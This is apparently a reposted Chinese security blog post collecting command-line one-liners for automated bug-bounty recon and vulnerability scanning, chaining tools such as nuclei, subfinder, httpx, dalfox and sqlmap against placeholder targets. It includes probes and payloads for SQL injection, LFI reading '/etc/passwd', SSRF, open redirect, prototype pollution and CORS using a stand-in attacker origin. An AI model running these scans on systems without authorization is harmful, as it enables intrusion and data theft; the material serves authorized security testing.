自动化漏洞赏金迅速打点命令集合

admin 2023年7月30日23:01:48评论45 views字数 4289阅读14分17秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了




注意:本文不含工具安装教程,请自行安装并配置环境变量。以下命令仅适用于Linux|MacOS上运行。


1.单工具使用

Automatic Scan - 使用 wappalyzer 技术检测目标应用的技术栈或组件进行自动 Web 扫描

nuclei -u https://example.com -as

只运行在最新nuclei-templates版本中添加的模板

nuclei -u https://example.com -nt

跳过需要身份验证的模板

nuclei -no-verify -t https://example.com -t /root/nuclei-templates/

全漏洞扫描,结果去重写入文件

nuclei -t /root/nuclei-templates/ -severity critical,high,medium -l list.txt -bs 20 -c 30 -rl 120 -nc -es info | anew -q all_nuclei_output.txt

sql注入扫描

echo "http://www.example.com" | httpx -path "/listproducts.php?cat=1’" -ms "Error: You have an error in your SQL syntax;"

2.组合工作流

进行子枚举,检查HTTP服务,并将结果通过管道传输到 Nuclei 进行模板的漏洞扫描
subfinder -d targetdomain.com -silent | httpx | nuclei -t technologies/tech-detect.yaml
验证主机/域/资产存活状态
subfinder -d targetdomain.com -silent | httpx -silent -follow-redirects -mc 200 -timeout 10 | cut -d '/' -f3 | sort -uamass enum -d targetdomain.com | httpx -silent -follow-redirects --fc 0,502,400,405,410,503,504 -timeout 10| cut -d '/' -f3 | sort -u
网站预览截图
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
扫描子域测试站点
subfinder -d domain -silent | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz|api|staging|env|v1|stag|prod|dev|stg|test|demo|pre|admin|beta|vpn|cdn|coll|sandbox|qa|intra|extra|s3|external|back'
XSS
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @cat targets.txt | getJS | httpx --match-regex "addEventListener((?:'|")message(?:'|")"
SQL注入
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
SSRF
findomain -t http://target.com -q | httpx -silent -threads 1000 | gau |  grep "=" | qsreplace http://www.example.com
LFI
gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
重定向
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Prototype污染
subfinder -d http://target.com | httpx -silent | sed 's/$//?__proto__[testparam]=exploit//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
CORS
gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
提取js文件
echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1assetfinder http://vuln.target.com | waybackurls | grep -E ".json(?:onp?)?$" | anew
从网页源码中提取注释中URL
cat targets.txt | html-tool comments | grep -oE 'b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
从hackerone上发现转储所属目标企业资产
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
持续更新,欢迎补充


更多BugBounty自动化漏洞赏金技巧可以看下这个项目:https://github.com/0x13v/KingOfBugBountyTips


项目地址

大概看了下作者整理的命令,大多是老外挖洞时常用到的一些项目,师傅们可以自己去研究下。

nuclei:https://github.com/projectdiscovery/nucleinuclei-templates:https://github.com/projectdiscovery/nuclei-templateshttpx:https://github.com/encode/httpxsubfinder:https://github.com/projectdiscovery/subfinderamass:https://github.com/owasp-amass/amassassetfinder:https://github.com/tomnomnom/assetfinderdnsprobe:https://github.com/projectdiscovery/dnsprobeanew:https://github.com/tomnomnom/anewwaybackurls:https://github.com/tomnomnom/waybackurlsgf:https://github.com/gogf/gfsqlmap:https://github.com/sqlmapproject/sqlmapgau:https://github.com/lc/gauqsreplace:https://github.com/tomnomnom/qsreplacepage-fetch:https://github.com/detectify/page-fetchhaktrails:https://github.com/hakluke/haktrailstojson:https://github.com/tomnomnom/hacks/tree/master/tojsonhtml-tool:https://github.com/tomnomnom/hacks/tree/master/html-tool

文章来源:博客园(zha0gongz1)原文地址:https://www.cnblogs.com/zha0gongz1/p/17244222.html


关注我们

自动化漏洞赏金迅速打点命令集合 还在等什么?赶紧点击下方名片开始学习吧!自动化漏洞赏金迅速打点命令集合



信 安 考 证



需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜,还送【潇湘信安】知识星球1年!

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

自动化漏洞赏金迅速打点命令集合

推 荐 阅 读




自动化漏洞赏金迅速打点命令集合
自动化漏洞赏金迅速打点命令集合
自动化漏洞赏金迅速打点命令集合

自动化漏洞赏金迅速打点命令集合

原文始发于微信公众号(潇湘信安):自动化漏洞赏金迅速打点命令集合

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月30日23:01:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   自动化漏洞赏金迅速打点命令集合http://cn-sec.com/archives/1918358.html

发表评论

匿名网友 填写信息